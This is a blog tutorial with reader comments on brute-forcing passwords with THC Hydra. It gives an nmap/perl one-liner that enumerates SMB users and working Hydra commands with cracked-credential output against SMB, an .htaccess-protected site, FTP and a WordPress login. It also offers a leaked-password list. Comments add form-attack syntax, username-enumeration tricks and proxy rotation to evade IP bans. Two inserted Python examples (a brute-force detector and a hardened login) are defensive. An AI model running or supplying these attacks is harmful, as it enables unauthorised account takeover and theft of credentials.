Sometimes the only way in is to resort to password cracking (or, “brute forcing”). I would consider this to be another one of those last resort methods that I use when all else has failed.

I don’t like to use brute force methods because they’re noisy and can break stuff. There’s actually a fine line between a brute force and a denial of service attack, so be careful whenever using this method.

Anyway, there are 3 programs that I use when it comes to brute forcing passwords. There’s something I wrote (which is not public, so I won’t be releasing it.. sorry. :) ), there’s ncrack, which is relatively new and still under development, and then there’s THC Hydra.

I think ncrack will be a solid contender in this arena after it’s been fine-tuned, but as of this point, Hydra is still the leader, so that’s what I’m going to focus on in this post.

Hydra has the ability to brute force passwords over a multitude of services:

Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd

A couple of examples…

First, grab the userlist from the PDC (the primary domain controller)…

nmap --script=smb-enum-users 192.168.0.3 -p 445|perl -le 'while(<STDIN>){if(/^.*?\\(\w+)\s+.*/) { print "$1"; }}' >> userlist

Then run the userlist through Hydra:

# hydra -L userlist -P password 192.168.0.3 smb
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-06-17 12:08:24
[DATA] 1 tasks, 1 servers, 180 login tries (l:30/p:6), ~180 tries per task
[DATA] attacking service smb on port 139
[139][smb] host: 192.168.0.3 login: Administrator password: zygote
[139][smb] host: 192.168.0.3 login: audit password: qwerty
[139][smb] host: 192.168.0.3 login: bdouglas password: javajoe
[139][smb] host: 192.168.0.3 login: security password: qwerty
[139][smb] host: 192.168.0.3 login: testuser password: qwerty
[STATUS] attack finished for 192.168.0.3 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-06-17 12:08:24

You’ll notice that I started the attack at 12:08:24 and it finished at 12:08:24, to give you an idea of the speed.
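
What that burst looks like from the other side, as an added example (not the post’s or Hydra’s code): a small Python detector run over constructed authentication-log lines shaped like the run above, 180 guesses from one source against 30 accounts inside a single second, next to a real user who mistypes twice. The log format and the 10.0.0.x addresses are constructed for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (not any real product's): timestamp, source, user, result.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) src=(?P<src>\S+) "
    r"user=(?P<user>\S+) result=(?P<result>FAIL|OK)$"
)

def parse(line):
    """Return (timestamp, source, user, result), or None for a line we don't understand."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["src"], m["user"], m["result"])

def build_sample_log():
    """Constructed sample: one source tries 6 guesses against each of 30 accounts
    within the same second (the shape of the 180-try SMB run above; one guess
    lands), plus a real user who mistypes twice and then gets in."""
    lines = []
    for i in range(30):
        for k in range(6):
            result = "OK" if (i == 3 and k == 5) else "FAIL"
            lines.append(f"2010-06-17 12:08:24 src=10.0.0.7 user=user{i:02d} result={result}")
    lines += [
        "2010-06-17 12:09:10 src=10.0.0.21 user=bdouglas result=FAIL",
        "2010-06-17 12:09:15 src=10.0.0.21 user=bdouglas result=FAIL",
        "2010-06-17 12:09:22 src=10.0.0.21 user=bdouglas result=OK",
    ]
    return lines

def detect_bursts(lines, window=timedelta(seconds=60), max_failures=20, min_users=5):
    """Per-source sliding window over failed logons.  A source is flagged when it
    exceeds max_failures inside the window (classic brute force) or touches at
    least min_users distinct accounts (a short list sprayed across many users).
    Any success from a flagged source is recorded: that is the guess that landed."""
    recent = defaultdict(deque)   # src -> deque of (timestamp, user) failures
    alerts = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, user, result = rec
        q = recent[src]
        while q and ts - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        if result == "FAIL":
            q.append((ts, user))
            users = {u for _, u in q}
            if len(q) > max_failures or len(users) >= min_users:
                a = alerts.setdefault(src, {"failures": 0, "users": set(), "success_after_burst": []})
                a["failures"] = max(a["failures"], len(q))
                a["users"] |= users
        elif src in alerts:
            alerts[src]["success_after_burst"].append(user)
    return alerts

if __name__ == "__main__":
    for src, a in detect_bursts(build_sample_log()).items():
        print(f"{src}: {a['failures']} failures against {len(a['users'])} accounts; "
              f"successes after burst: {a['success_after_burst']}")
```

The success line after a burst is the one worth paging on: it is the guessed password being used, and it never appears in a failed-logon count.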

The next example will be attacking their website. Their website uses .htaccess to protect certain areas. We’ll use the same userlist that we stole from the PDC and hope that one of them is listed in the .htpasswd file.

# hydra -L userlist -P password www.companysite.com https-head /financials/
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-06-17 12:15:15
[DATA] 16 tasks, 1 servers, 217 login tries (l:31/p:7), ~13 tries per task
[DATA] attacking service http-head on port 443
[443][www] host: 11.22.33.44 login: bdouglas password: javajoe
[STATUS] attack finished for www.companysite.com (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-06-17 12:15:22

Great, found one. Now it would be really handy to have access to the FTP site for their website…

# hydra -L userlist -P password ftp.companysite.com ftp -f
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-06-17 12:24:14
[DATA] 16 tasks, 1 servers, 224 login tries (l:32/p:7), ~14 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.companysite.com login: bdouglas password: javajoe
Hydra (http://www.thc.org) finished at 2010-06-17 12:24:17

This bdouglas guy has access everywhere.. and he’s super original with his passwords, too.

As you can see, Hydra is pretty effective when it comes to brute forcing various services. The most important part is to have an effective password list.

Because humans are, well, human, they tend to think alike. That’s why passwords like “love”, “sex” and “password” are always amongst the top of the “Most Frequently Used Passwords” list. So, what I’ve done is collected password lists from various network compromises where a password list was made public, combined them all into one gigantic list of 17,965,793 passwords, and wrote a little script to make sure there are no duplicates. :-)

The sources used to create this list are:

  • The 500 worst passwords list
  • Alyssa banned passwords list
  • Cain’s list of passwords
  • Conficker’s list
  • The English dictionary
  • Faithwriters banned passwords list
  • Hak5’s list
  • Hotmail’s banned passwords list
  • Myspace’s banned passwords list
  • PHPbb’s compromised list
  • RockYou’s compromised list
  • Twitter’s banned passwords list
  • The names of all US cities
  • And various other ones that aren’t worth mentioning…
What we wind up with is an enormous list of the most popular passwords, which is incredibly effective.

And, because I’m such a nice and wonderful guy, I’ve decided to share it with my readers. You can find it here. It’s bzipped and still about 95 megs.

You can find THC at www.thc.org and you can find THC Hydra at http://freeworld.thc.org/thc-hydra/

It’s also worth mentioning, though, that Hydra seems to fall short when it comes to web forms. Theoretically, it’s capable of handling a web form, but I’ve yet to be able to make it work. For that, I use other utilities, which I’ll blog about here at some point.

However, according to the Hydra documentation, this is how it’s supposed to work against a web form:

# hydra -l admin -P password www.wordpressblogsite.org http-post-form "/wordpress/wp-login.php:user_login=^USER^&user_pass=^PASS^:Incorrect" -t 4

What this is telling Hydra is that the form’s two input boxes are named “user_login” and “user_pass”, respectively, that a response containing “Incorrect” means the login failed, and that Hydra should fill in those blanks with the username and password combinations specified on the command line.

To figure out what the form’s input boxes are named, go to the website, view the source of the page, and look for something like:

…snip…
<input type="text" name="log" id="user_login" class="input">
…snip…
<input type="password" name="pwd" id="user_pass" class="input">

Pretty simple, but, again, Hydra doesn’t seem to like it. If you’ve gotten this to work yourself, please let me know. I’d be interested in seeing what I’m doing wrong. :-)

    1. Erik says:

      I’d be interested to know what you use your personal cracker for (anything specific or an all around good cracker). Also, last night I started piecing together a wordlist as well. I feel like everything I’m looking for at a given time, I can just find on your blog. strange. But definitely another great read.

    2. Matt says:

      @Erik: My personal one is a lot like Hydra, but I feel more comfortable with it. Also, unlike Hydra, you don’t have to specify the post type (i.e., is it .htaccess, or is it a PHP form?). It determines this on its own. It also does some other trickery that just makes it easier to use, in my opinion.

      But, Hydra is a perfectly good alternative to it.. it’s just a little more clunky and less automated.

      I might eventually release my cracker.. but I would first have to clean up the code as to not embarrass myself.. ;-)

    3. Erik says:

      haha…we don’t judge :-p

    4. Matt says:

      @Erik: Pfft.. with the amount of trash talking I do on here about other people’s sloppy, buggy, vulnerable code.. I’d be nailing myself to the cross if I released anything that wasn’t (mostly..) perfect.. lol :-)

    5. netalien says:

      Ah… that nifty tool :D

      From my point of view I think that brute forcing should be considered when doing an internal pentest instead of using it as a last resort for any other purpose, mainly because of the noise and near denial-of-service caveats already mentioned. It’s easier when you have some insight into resource usage and restrictions on the system being tested, because you can customize how you use the tool in a way that’s less disruptive.

      The good thing though is that many people use really bad user/password combinations, so noise and resource considerations are not necessarily a concern.

      There are quite a few brute force tools around, but I think Hydra is just great because of the number of services it handles. Although there’s always the chance that a specialized tool can do a better job with a specific service, having one that does the job very well on so many different services is a great plus.

      As far as the web form goes, I did a test after reading this but it ended the same way yours did. I still don’t know if there’s something missing in the params or what, but I didn’t have enough time to play with it, so I will be checking that later.

      Thanks for the fun reading and I hope you consider releasing your cracker, c’mon, others should be able to make fun of your sloppy, buggy, vulnerable code too… nah, just joking :)

    6. Matt says:

      @netalien: As a pen tester, it’s kind of interesting when you run into companies who say “Don’t touch this” or “Don’t test that” or “Make sure you don’t break this” because, really, trying to break stuff is part of the test. If doing a brute force attack against a system breaks it, you have a serious issue because someone else out there, with ill intent, will eventually try the same thing. I mean, I understand where they’re coming from, because no one wants to deal with a downed critical service at 4am, but, in reality, that’s kind of par for the course on the internet. It’s really doing an injustice.

      Yeah, I’m going to have to play around with Hydra a bit more, too, to see if I can get the web form stuff working. According to the docs, it should…

      And.. ha! So much peer pressure to release it. I promise that at some point I will. ;-)

    7. netalien says:

      A good point indeed, that’s when the social engineer skills come in handy.

      Normally those who don’t understand the risks or don’t have the technical staff (or even interest) to deal with things like risk assessment and management, incident response, and the cost associated with data loss or a breach compared with a system being down for an hour because of a pen test, are the first ones to say “test this but not that, because we depend on that”, which, as you said, is an incomplete approach.

      Those systems that are depended on more are the ones that need the assessment more, without leaving the less depended-on ones out though. In the end, all an interested attacker will need is one point of access; if that happens to be your most important system, the one that should not be touched during the pen test, bad luck, it’s not a concern for him/her. He/she wants to break in, and it doesn’t matter if it hurts infrastructure stability, company reputation and so on…

    9. I use a cracker that I made in PHP. It’s important to have it connect through different proxies because some sites will ban your IP address if too many failed attempts happen.

    10. kn1ghtmare says:

      You should check out medusa. http://www.foofus.net/~jmk/medusa/medusa.html

    11. Matt says:

      @kn1ghtmare: Thanks.. I’ve been meaning to play with Medusa, but I haven’t had a chance yet. I’ll add it to my list.. I do know that everyone says it’s better than Hydra, which I believe.. lol

    12. nick says:

      Really, tnx for this tutorial. I now have lots of clues on Hydra.
      But can u show me how you came up with nmap? U extracted the userlist. How?
      I tried it but nmap doesn’t recognize the command.
      Please help.
      Tnx a lot.

    13. Matt says:

      @nick: It looks like when I pasted the code, my theme removed the “STDIN” in between the brackets in the while statement. So, it should look like this:

      nmap --script=smb-enum-users 192.168.0.3 -p 445|perl -le 'while(<STDIN>){if(/^.*?\\(\w+)\s+.*/) { print "$1"; }}' >> userlist

    14. nick says:

      @matt
      tnx again and sorry for the late response… been busy…
      I’ve tested your code and yes, nmap recognized the commands. But bad luck for me :( I haven’t got the users….
      The userlist is empty….

      but thank you very much again…helps lot! ;)

    15. nick says:

      @matt

      hey i forgot!
      tnx for the wordlist! :)

    16. Matt says:

      @nick: lol.. np man. :-)

    17. Rail Mathus says:

      I am new to Hydra. I want to break a ZyXEL AP but there is only a password entry. With Medusa I can use the command ;;password to have the program look for passwords. How do I do this with Hydra?

    18. fio says:

      Hi, thanks for your good work.
      I tried Hydra and it works on POP3 email.
      I failed to make it work with a web form.
      I use (in Windows 7 with “cmd” DOS emulation):
      hydra -l dafne1 -P fiopass.txt -o log.txt xxxxx.xxxxx.com http-post-form "/index.php:loginName=^USER^&loginPasswd=^PASS^:failure"
      and the result is a list with all attempts:
      login: dafne1 password: pass1
      login: dafne1 password: pass2
      login: dafne1 password: pass3
      ……
      but no indication of what the right password is!!!!
      (in fiopass.txt there is also the right password)
      Can you help me please????
      Can I write to you in private???
      Thanks
      (sorry for my bad English)

    19. Mr.Hacker says:

      What´s the PDC? xP

    20. Elwon says:

      I have gotten hydra to work on Http forms GET and POST and the syntax you have written is almost perfectly fine:
      # hydra -l admin -P passwod http://www.wordpressblogsite.org http-post-form "/wordpress/wp-login.php:user_login=^USER^&user_pass=^PASS^:Incorrect" -t 4

      Obviously you need to feed it a set username or username list and a set password or password list. Lowercase (-l or -p) is a set username/password; uppercase (-L or -P) is a username/password list. (In the above case you’ve used uppercase P but not provided a list; instead you’ve provided a set password (unless you have a file named passwod in your current folder?)

      Replace the word “Incorrect” with whatever unique string is returned on failure. “Invalid password”, whatever.
      If the site is insecure enough to provide a different string for incorrect usernames than it does for incorrect passwords, then it’s a good idea to use a set unlikely password and a list of usernames to enumerate a list of valid usernames first. You can then use this list of valid usernames to save yourself a lot of time.

      I have noticed there are a couple of flaws in Hydras form cracking methods though.
      1: If the form uses POST for the usernames and passwords but uses GET for other information simultaneously, you will have to do a little work to see which the form will accept, as Hydra won’t allow you to mix. For example, a site I came across recently used POST for users and passwords but GET for an extra variable “Confirm=1”. Using POST on Hydra wouldn’t work because the site wouldn’t take confirm=1 POSTed. However, using Hydra’s GET attack did work because the site would take the usernames and passwords as GET. If that makes any sense?
      2: The very same site would allow me up to 1200 attempts a min. However, because Hydra only allows you to pass it a string to search for on an unsuccessful attempt, if that string isn’t found it assumes valid. Whilst going at speed it will often only half download pages (stopping before the invalid string in the page). This returned false positives. As Hydra doesn’t allow you to tell it to continue with the same username even after it’s found the password, this resulted in it getting a false positive and moving on to the next username. If this option was available, false positives wouldn’t matter so much because it would still go on to test the rest of the password list against that username. After Hydra has finished you could then go on to test all the false positives again, which would take no time. Instead Hydra skips that username, believing it’s found the password already. Without changing the code there’s no way to prevent this. Also, as mentioned before, Hydra will only allow you to set a string for incorrect attempts; if it isn’t found, it’s assumed valid. I happened to have a valid U/P for this site. Therefore I had access to a string that would only be returned if the attempt was valid. If Hydra would allow a double check, “Invalid” if it’s invalid and “Welcome” if it’s valid, this would also prevent false positives. It could recheck a password each time BOTH requirements aren’t fulfilled (in the case that “Invalid” doesn’t appear, and neither does “Welcome”). If either of these options were added (a valid string parameter and a continue-with-the-same-username-after-successful-login option), these somewhat major problems could be avoided.

      These problems serve to make Hydra a thousand times less automated. Each time there’s a false positive I have to stop Hydra, open the password list, remove the passwords up to the false positive and save the password file as new with the username it stopped on appended to the name. Then start the search with that username again with the altered password file. Frustrating to say the least when you have 7 admin usernames and want to pass a very large password file through each one of them.

      Anyway, I hope this has helped explain Hydra’s form method a little better. I know my explanation skills aren’t great so, sorry about that :P
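
The two form behaviours Elwon describes, a different answer for a bad username than for a bad password and nothing stopping 1200 guesses a minute, are the defender’s side of the same problem. This added example (not the post’s, Elwon’s or Hydra’s code) shows a toy login check in a leaky and a hardened version; the single-account user store, the reuse of the `javajoe` credential from the post, and the back-off schedule are all constructed for the illustration.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

# Constructed user store: username -> (salt, hash).  One account, reusing the
# password from the post so the examples read alike.
_SALT = os.urandom(16)
USERS = {"bdouglas": (_SALT, _hash("javajoe", _SALT))}
_DUMMY = _hash("not-a-real-password", _SALT)   # so unknown users cost the same time

def login_leaky(user, password):
    """Two different failure messages: a guesser can tell an unknown account from a
    wrong password, so a username list can be validated before any password is tried."""
    if user not in USERS:
        return False, "Unknown user"
    salt, stored = USERS[user]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return False, "Incorrect password"
    return True, "Welcome"

GENERIC = "Invalid credentials"
FREE_FAILURES = 5            # failures allowed before the back-off starts
_state = defaultdict(lambda: {"fails": 0, "not_before": 0.0})   # per submitted name

def login_hardened(user, password, clock=time.monotonic):
    """One answer for every failure, and exponential back-off per account once
    FREE_FAILURES is reached: after N failures the account refuses every attempt,
    even the right password, for 2**(N-FREE_FAILURES) seconds, and attempts made
    during the back-off extend it.  `clock` is injectable so tests need no sleeping."""
    now = clock()
    st = _state[user]
    salt, stored = USERS.get(user, (_SALT, _DUMMY))
    ok = hmac.compare_digest(_hash(password, salt), stored) and user in USERS
    if ok and now >= st["not_before"]:
        _state.pop(user, None)                 # success clears the counter
        return True, "Welcome"
    st["fails"] += 1
    if st["fails"] >= FREE_FAILURES:
        st["not_before"] = now + 2 ** (st["fails"] - FREE_FAILURES)
    return False, GENERIC
```

With the hardened version a failure-string check has nothing to distinguish, and the seventh guess against an account already waits seconds rather than milliseconds.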

    21. martin says:

      @Matt: thank you for this tutorial! In addition, nice password list ;)

      I set up an ASUS WL-500gP with original ASUS firmware to my LAN with IP address 192.168.1.1. If I navigate to address http://192.168.1.1:8080/ in my Firefox address bar, an “Authentication required” window opens up asking for “User name: ” and “Password: “. Correct “User name: ” is “admin” and correct “Password: ” is “pA55w0Rd”. They work fine if I type them in manually to the “Authentication required” window, but for some reason I can’t get in using the hydra with words.txt password file, which contains “pA55w0Rd”:

      http://pastebin.com/ukm88xet

      What might cause this? If any additional information is needed, please ask!

    22. fher98 says:

      So in the end… is there another tool besides Hydra to crack WordPress?

    23. phton says:

      i am also having the same problem…
      although i am doing the brute force attack but no result

      hydra -l admin -P passwd.txt 192.168.1.1 https-head /protected/login/
      Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak – for legal purposes only

      Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-13 11:48:59
      [DATA] 11 tasks, 1 server, 11 login tries (l:1/p:11), ~1 try per task
      [DATA] attacking service http-head on port 443
      [443][www] host: 192.168.1.1 login: admin password: test2
      [443][www] host: 192.168.1.1 login: admin password: admin
      [443][www] host: 192.168.1.1 login: admin password: test1
      [443][www] host: 192.168.1.1 login: admin password: 12345678
      [443][www] host: 192.168.1.1 login: admin password: 12345678
      [443][www] host: 192.168.1.1 login: admin password: root
      [443][www] host: 192.168.1.1 login: admin password: 123456789
      [443][www] host: 192.168.1.1 login: admin password:
      [443][www] host: 192.168.1.1 login: admin password: 123
      [443][www] host: 192.168.1.1 login: admin password: super
      [443][www] host: 192.168.1.1 login: admin password: abcdefg
      [STATUS] attack finished for 192.168.1.1 (waiting for children to finish)
      1 of 1 target successfuly completed, 11 valid passwords found
      Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-13 11:49:06

    24. Arkaic says:

      @Elwon

      About your 2nd point. Actually, hydra does allow you to specify a success condition instead of a failure.

      Read the output of "hydra -U http-form-post".

      Here is a relevant portion:

      Third is the string that it checks for an *invalid* login (by default)
      Invalid condition login check can be preceded by “F=”, successful condition
      login check must be preceded by “S=”.

    25. ramster says:

      Hey buddy, great stuff. Any chance of telling me more about the nmap --script=smb-enum-users 192.168.0.3 -p 445|perl -le 'while(){if(/^.*?\\(\w+)\s+.*/) { print "$1"; }}' >> userlist
      script, as I have tried and tried and can’t get any user data from any servers.

      Would like to understand it a bit more,

      Thanks!

    26. nikt0 says:

      Large password list is available from http://dazzlepod.com/uniqpass/; pretty useful for an effective large scale dictionary attack!
